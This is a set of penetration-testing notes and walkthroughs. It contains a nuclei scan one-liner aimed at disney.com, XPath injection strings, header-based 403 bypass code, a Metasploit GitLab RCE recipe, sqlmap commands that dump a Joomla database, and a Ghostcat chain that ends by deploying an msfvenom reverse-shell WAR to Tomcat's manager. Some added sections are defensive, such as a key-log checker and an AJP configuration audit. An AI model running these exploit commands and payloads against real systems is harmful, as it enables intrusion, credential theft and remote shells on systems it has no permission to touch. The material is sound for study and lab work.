Notes for finding security flaws

subfinder -d disney.com -silent -all | httpx -silent -threads 100 | nuclei -id CVE-2022-26138 -v
fuxploider: file upload vulnerability scanner and exploitation tool
If you want to bypass a protected endpoint, always use your own methodology. Example of an HTTP-header-based bypass:
1. X-Original-URL: /redact
Example: GET /api/getUser HTTP/1.1 -> 403
Host: redact.com
GET … Continue reading
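The header-based bypass idea above, as an added example that is not part of the original notes: the probe sends the baseline request, then each header variant, and reports which ones turn the 403 into a 2xx. The hostname, port and the protected path /api/getUser are assumptions; the local server at the bottom is a constructed stand-in for a misconfigured front end (ACL on the request line, routing that trusts X-Original-URL) so the probe can be run offline.

```python
"""Probe a 403 endpoint with header-based bypass variants.

Added example, not part of the original notes. The hostname, port and the
protected path /api/getUser are assumptions; the local server at the bottom
is a constructed stand-in for a misconfigured front end so the probe can be
run offline.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

FORBIDDEN_PATH = "/api/getUser"  # assumed protected endpoint


def bypass_variants(path):
    """Request-line path and headers for each bypass attempt.

    Rewrite headers (X-Original-URL, X-Rewrite-URL) ask for a harmless path
    and smuggle the real target in the header; the others ask for the target
    directly and claim an internal origin.
    """
    return {
        "X-Original-URL": ("/", {"X-Original-URL": path}),
        "X-Rewrite-URL": ("/", {"X-Rewrite-URL": path}),
        "X-Forwarded-For": (path, {"X-Forwarded-For": "127.0.0.1"}),
        "X-Custom-IP-Authorization": (path, {"X-Custom-IP-Authorization": "127.0.0.1"}),
        "X-Forwarded-Host": (path, {"X-Forwarded-Host": "localhost"}),
    }


def _status(host, port, path, headers):
    """One GET, one connection, return the status code."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers=headers)
        return conn.getresponse().status
    finally:
        conn.close()


def probe(host, port, path):
    """Return {'baseline': status, variant_name: status, ...}."""
    results = {"baseline": _status(host, port, path, {})}
    for name, (req_path, headers) in bypass_variants(path).items():
        results[name] = _status(host, port, req_path, headers)
    return results


def find_bypasses(host, port, path):
    """Names of variants that turned the baseline 403 into a 2xx."""
    results = probe(host, port, path)
    if results["baseline"] != 403:
        return []  # nothing to bypass (or already open)
    return [k for k, v in results.items() if k != "baseline" and 200 <= v < 300]


class _MisconfiguredFrontEnd(BaseHTTPRequestHandler):
    """Constructed target: the ACL checks the request line only, but routing
    then trusts X-Original-URL, so the ACL never sees the real path."""

    def do_GET(self):
        if self.path == FORBIDDEN_PATH:
            return self._reply(403, b"forbidden")
        routed = self.headers.get("X-Original-URL", self.path)
        if routed == FORBIDDEN_PATH:
            return self._reply(200, b'{"user": "admin"}')
        self._reply(404, b"not found")

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_demo_server():
    """Serve the constructed target on a random loopback port."""
    srv = HTTPServer(("127.0.0.1", 0), _MisconfiguredFrontEnd)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_demo_server()
    port = srv.server_address[1]
    print(probe("127.0.0.1", port, FORBIDDEN_PATH))
    print("bypasses:", find_bypasses("127.0.0.1", port, FORBIDDEN_PATH))
    srv.shutdown()
```

Against a real target, replace the demo server with the host and port of the application and compare status codes and body lengths, not just the status: some front ends answer 200 with a login page for every path, which this probe would wrongly count as a bypass.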

Analyzing viruses safely

Create a Windows 10 virtual machine with at least 60 GB of disk (keep it on an isolated, host-only network with no shared folders, and snapshot it before running any sample). Download a trial version of Windows, upload the ISO to your datacenter, attach the ISO file to the virtual machine's CD-ROM drive and proceed with the usual Windows installation. Permanently disable Windows Defender … Continue reading

XPath vulnerability

One can try entering one of the following as the username, with anything as the password (one variant per quoting style):
x" or 1=1 or "a"="a
x' or 1=1 or 'a'='a
In a query such as //user[name/text()='USER' and password/text()='PASS'] the injected text yields name/text()='x' or 1=1 or 'a'='a' and password/text()='...'; since XPath's and binds tighter than or, the always-true 1=1 stands alone and the predicate matches every user node, so the password check is bypassed.
https://owasp.org/www-community/attacks/XPATH_Injection
https://book.hacktricks.xyz/pentesting-web/xpath-injection
https://medium.com/@shatabda/security-xpath-injection-what-how-3162a0d4033b

GitLab RCE exploit

Some versions of GitLab Community Edition are vulnerable; version 12.8.1, for example. The Metasploit module needs a valid account (hence the username and password): it uses an arbitrary file read to recover the Rails secret_key_base and then forges a signed cookie that deserializes into code execution. In msfconsole:
use exploit/multi/http/gitlab_file_read_rce
set rhosts 10.9.0.69
set rport 443
set vhost git.searchevolution.com
set username r0cker
set password blabla
set ssl true
set lhost 10.9.0.60
exploit
bash -i
After that we are in a shell, but we cannot … Continue reading

Wireshark and the ssl.txt decryption key file

For example, we find an ssl.txt file containing the records below. This is the NSS key log format (one record per line: label, client random, secret), written by a client started with the SSLKEYLOGFILE environment variable; Wireshark reads it via Edit > Preferences > Protocols > TLS > (Pre)-Master-Secret log filename.
CLIENT_RANDOM 432738e149bdfb67ce70ca989045c1f2f7589d688e81c327c57f38e1ed457295 ee0b404dfdb59ecdcb0c12dd5a821060b2f9934bae9c1775509a10a1d74f6a9436f5246233ed71164a9a7e017d417afa
CLIENT_HANDSHAKE_TRAFFIC_SECRET ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 e9f0289a01cacc61add59eedc828b5a91ee98bcf34c52123209d3ca9d4170d77
SERVER_HANDSHAKE_TRAFFIC_SECRET ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 a60084872c3de44f6e427c664406e24225d6a2f54a542766a372d57151975e6d
CLIENT_TRAFFIC_SECRET_0 ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 b43bb936824ff4a73009ddac4a85c12e055dbbafa001a084aeb06b1a521cb18c
SERVER_TRAFFIC_SECRET_0 ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 00085b37bef7ca53b2b71785556b32fdf1207cc77efa8d164bcad92bb628c693
EXPORTER_SECRET ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 e17b06f96a89a5703bbc7668c60c03422d05a8822cebc339135c459c33272abc
CLIENT_HANDSHAKE_TRAFFIC_SECRET ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 5e5779e10ca7e9ae486d4e8644d2ad6603d8ae3215d647833295a9bee362982f
SERVER_HANDSHAKE_TRAFFIC_SECRET ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 70cd3d7ad0d317b857ae0f496af7de44cc06614969ca836690e149d10994c8d7
CLIENT_TRAFFIC_SECRET_0 ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 d91ae414d06aa79e3e2f6bf8d61c65bac83e456060c3b407dba9e2bbdb28ec12
SERVER_TRAFFIC_SECRET_0 ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 e09758821d5fa4a72c6e9640bf35b82eb0f7e2e99ac3f1654b0b5daa9943bd1e
EXPORTER_SECRET ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 176ba414e1ac9c60a52bda4105e6fbd895dbb1b11f03b9dcd658661ac4ac358f
CLIENT_HANDSHAKE_TRAFFIC_SECRET c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 be84a5fcc04fc7fa8b9affc084cc6196d9e9dffbee7561b5f3139e641fb75996
SERVER_HANDSHAKE_TRAFFIC_SECRET c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 8175446c4375095926b09edf66bcd81f76e6f3321c525454ba4d6357bb3840ec
CLIENT_TRAFFIC_SECRET_0 c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 f901b6d144c94ff7f64e444e56fdf7aeee38142ff474126df6d5609ed912d5b6
SERVER_TRAFFIC_SECRET_0 c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 0a077ed44185f451015e2e33c4bd25ca1ee0990c0d4c8b91ece32d57b1104c10
EXPORTER_SECRET c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 … Continue reading
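Before handing a key log like the one above to Wireshark it is worth knowing which sessions it can actually decrypt. The following is an added example, not part of the original post: it parses the NSS key log format, groups records by client random, and tells TLS 1.2 sessions (a single CLIENT_RANDOM record with the 48-byte master secret) apart from TLS 1.3 sessions (several *_TRAFFIC_SECRET records), flagging TLS 1.3 sessions where one of the two application-data secrets is missing, which happens when the capture stops mid-handshake. The sample log embedded below is constructed, not taken from a real capture.

```python
"""Inventory the sessions in an NSS key log such as ssl.txt before loading it
into Wireshark.

Added example, not part of the original post. One record per line:
"LABEL <client_random> <secret>", all hex. A TLS 1.2 session is a single
CLIENT_RANDOM record carrying the 48-byte master secret; a TLS 1.3 session
is a group of *_TRAFFIC_SECRET records sharing one client random, and
Wireshark can only decrypt its application data if both
CLIENT_TRAFFIC_SECRET_0 and SERVER_TRAFFIC_SECRET_0 were logged. The
sample log below is constructed, not a real capture.
"""
from collections import defaultdict

APP_DATA_LABELS = {"CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0"}
KNOWN_LABELS = APP_DATA_LABELS | {
    "CLIENT_RANDOM",
    "CLIENT_EARLY_TRAFFIC_SECRET",
    "EARLY_EXPORTER_MASTER_SECRET",
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET",
    "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "EXPORTER_SECRET",
}


def _hex_bytes(field, n, what):
    """Decode a hex field, enforcing an exact byte length when n is given."""
    try:
        raw = bytes.fromhex(field)
    except ValueError:
        raise ValueError(f"{what}: not hex") from None
    if n is not None and len(raw) != n:
        raise ValueError(f"{what}: expected {n} bytes, got {len(raw)}")
    return raw


def parse_keylog(text):
    """Return {client_random_hex: {label: secret_hex}} or raise ValueError."""
    sessions = defaultdict(dict)
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected 3 fields, got {len(parts)}")
        label, client_random, secret = parts
        if label not in KNOWN_LABELS:
            raise ValueError(f"line {lineno}: unknown label {label}")
        _hex_bytes(client_random, 32, f"line {lineno} client random")
        _hex_bytes(secret, None, f"line {lineno} secret")
        sessions[client_random.lower()][label] = secret.lower()
    return dict(sessions)


def classify(sessions):
    """Map each client random to (version, decryptable).

    TLS 1.2: decryptable if the master secret is 48 bytes. TLS 1.3: decryptable
    if both application-data secrets are present and all secrets share one
    length (32 bytes for SHA-256 suites, 48 for SHA-384).
    """
    out = {}
    for cr, recs in sessions.items():
        if "CLIENT_RANDOM" in recs:
            out[cr] = ("TLS1.2", len(recs["CLIENT_RANDOM"]) == 96)
            continue
        lengths = {len(s) for s in recs.values()}
        ok = APP_DATA_LABELS <= recs.keys() and len(lengths) == 1 and lengths <= {64, 96}
        out[cr] = ("TLS1.3", ok)
    return out


SAMPLE_KEYLOG = "\n".join([
    "# constructed sample, not from a real capture",
    f"CLIENT_RANDOM {'11' * 32} {'aa' * 48}",
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {'22' * 32} {'b1' * 32}",
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {'22' * 32} {'b2' * 32}",
    f"CLIENT_TRAFFIC_SECRET_0 {'22' * 32} {'b3' * 32}",
    f"SERVER_TRAFFIC_SECRET_0 {'22' * 32} {'b4' * 32}",
    f"EXPORTER_SECRET {'22' * 32} {'b5' * 32}",
    # capture stopped before the server's application secret was logged
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {'33' * 32} {'c1' * 32}",
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {'33' * 32} {'c2' * 32}",
    f"CLIENT_TRAFFIC_SECRET_0 {'33' * 32} {'c3' * 32}",
])

if __name__ == "__main__":
    for cr, (version, ok) in classify(parse_keylog(SAMPLE_KEYLOG)).items():
        print(f"{cr[:16]}... {version} {'decryptable' if ok else 'INCOMPLETE'}")
```

On the command line the same file is passed to tshark with -o tls.keylog_file:ssl.txt -r capture.pcapng; the client random printed by this script is what Wireshark matches against the ClientHello of each session.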

Joomla 3.7.0 exploit

The list[fullordering] parameter of com_fields in Joomla 3.7.0 (CVE-2017-8917) is injectable; sqlmap exploits it error-based through updatexml, one step at a time (databases, tables, columns, dump):
sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found --tables -p list[fullordering]
sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found -T 'table_found' --columns -p list[fullordering]
sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found -T 'table_found' -C username --dump -p list[fullordering]
sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found … Continue reading
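What sqlmap automates in those runs is error-based extraction through updatexml(). The following is an added example, not part of the original notes: MySQL's "XPATH syntax error" message echoes at most 32 characters of the offending XPath string, so the payload prefixes a '~' marker and pages through the target expression 31 characters per request with mid(). The fetch callable is an assumption standing in for the HTTP request that sends the payload as list[fullordering] and returns the body; fake_backend() is a constructed stand-in for the vulnerable site so the loop can be exercised offline.

```python
"""Error-based extraction through updatexml(), the technique behind the sqlmap
runs against list[fullordering].

Added example, not part of the original notes. MySQL's "XPATH syntax error"
message echoes at most 32 characters of the offending XPath string, so the
payload prefixes a '~' marker and pages through the expression 31 characters
per request with mid(). The fetch callable is an assumption standing in for
an HTTP request that sends the payload as list[fullordering] and returns the
body; fake_backend() is a constructed stand-in for the vulnerable site.
"""
import re

CHUNK = 31  # 32-character error window minus the '~' marker
LEAK_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def updatexml_payload(expr, pos):
    """Value for list[fullordering] that leaks mid(expr, pos, CHUNK)."""
    return f"updatexml(1,concat(0x7e,mid(({expr}),{pos},{CHUNK})),1)"


def parse_leak(body):
    """Extract the leaked window from a MySQL error page, or None."""
    m = LEAK_RE.search(body)
    return None if m is None else m.group(1)


def extract(fetch, expr):
    """Reassemble the full value of expr from successive 31-character windows."""
    out, pos = "", 1
    while True:
        chunk = parse_leak(fetch(updatexml_payload(expr, pos)))
        if not chunk:
            break  # empty window (or no error in the page): past the end
        out += chunk
        if len(chunk) < CHUNK:
            break  # short window: that was the last one
        pos += CHUNK
    return out


def fake_backend(value):
    """Constructed target: answers like a Joomla page whose MySQL error leaks
    mid() over a fixed value, so extract() can run without a server."""
    window_re = re.compile(r"mid\(\(.*?\),(\d+),(\d+)\)")

    def fetch(payload):
        m = window_re.search(payload)
        pos, length = int(m.group(1)), int(m.group(2))
        leaked = value[pos - 1:pos - 1 + length]
        return f"<html>Error: 1105 XPATH syntax error: '~{leaked}'</html>"

    return fetch


if __name__ == "__main__":
    fetch = fake_backend("5.7.31-0ubuntu0.18.04.1")  # constructed version string
    print(extract(fetch, "version()"))
```

Against a live Joomla 3.7.0, fetch() would URL-encode the payload into list[fullordering] and return the response text; the paging logic is what keeps a value longer than 31 characters (a password hash, a group_concat of table names) from being silently truncated.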

Hacking Tomcat

There is a vulnerability in Tomcat's AJP service (Ghostcat). AJP is the binary connector protocol Tomcat exposes (port 8009 by default) for a front-end web server; Ghostcat lets an unauthenticated client read files inside a web application (WEB-INF/web.xml, for example) and, if a file can be uploaded, include it as JSP.
wget https://www.exploit-db.com/download/48143
python2 48143.py 10.10.151.49  # reads WEB-INF/web.xml by default; we find a username and password there.
msfvenom -p java/shell_reverse_tcp lhost=10.9.0.60 lport=4444 -f war -o pwn.war
curl -u user_found:password_found --upload-file pwn.war 'http://10.10.151.49:8080/manager/text/deploy?path=/shell'  # the text interface needs the manager-script role; requesting /shell/ afterwards triggers the reverse shell. It is also possible to upload … Continue reading
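The precondition for Ghostcat is an AJP connector reachable from the network, which is visible in server.xml. The following is an added example, not part of the original notes: it audits a server.xml for AJP connectors that are bound to all interfaces, or left without an address on a build older than Tomcat 9.0.31 / 8.5.51 / 7.0.100 (the releases that changed the defaults to loopback plus a required shared secret), and that have no secret configured. Both server.xml fragments are constructed; the secret value in the hardened one is a placeholder.

```python
"""Audit a Tomcat server.xml for an AJP connector reachable from the network,
the precondition for Ghostcat.

Added example, not part of the original notes. Tomcat 9.0.31, 8.5.51 and
7.0.100 changed the AJP defaults to bind to loopback and require a shared
secret (secretRequired="true"); an explicit address="0.0.0.0" or an unset
address on an older build, combined with no secret, leaves port 8009 open to
anyone who can reach it. Both server.xml fragments below are constructed.
"""
import xml.etree.ElementTree as ET


def ajp_findings(server_xml):
    """One finding string per AJP connector that looks exposed; [] when clean."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        port = conn.get("port", "8009")
        address = conn.get("address")
        issues = []
        if address is None:
            issues.append("no address set (all interfaces before 9.0.31/8.5.51/7.0.100)")
        elif address in ("0.0.0.0", "::"):
            issues.append(f"bound to {address}")
        if not conn.get("secret"):
            issues.append("no shared secret")
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append("secretRequired disabled")
        if issues:
            findings.append(f"AJP connector on port {port}: " + "; ".join(issues))
    return findings


# Constructed: the stock pre-2020 connector, no address, no secret.
VULNERABLE_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>
"""

# Constructed: loopback only, and a secret the front-end proxy must present
# (the value is a placeholder, not a real secret).
HARDENED_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-LONG-RANDOM-SECRET"/>
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>
"""

if __name__ == "__main__":
    print(ajp_findings(VULNERABLE_SERVER_XML) or ["no exposed AJP connector"])
    print(ajp_findings(HARDENED_SERVER_XML) or ["no exposed AJP connector"])
```

If no front-end proxy speaks AJP to the instance at all, the cleaner fix is to comment the connector out entirely rather than lock it down.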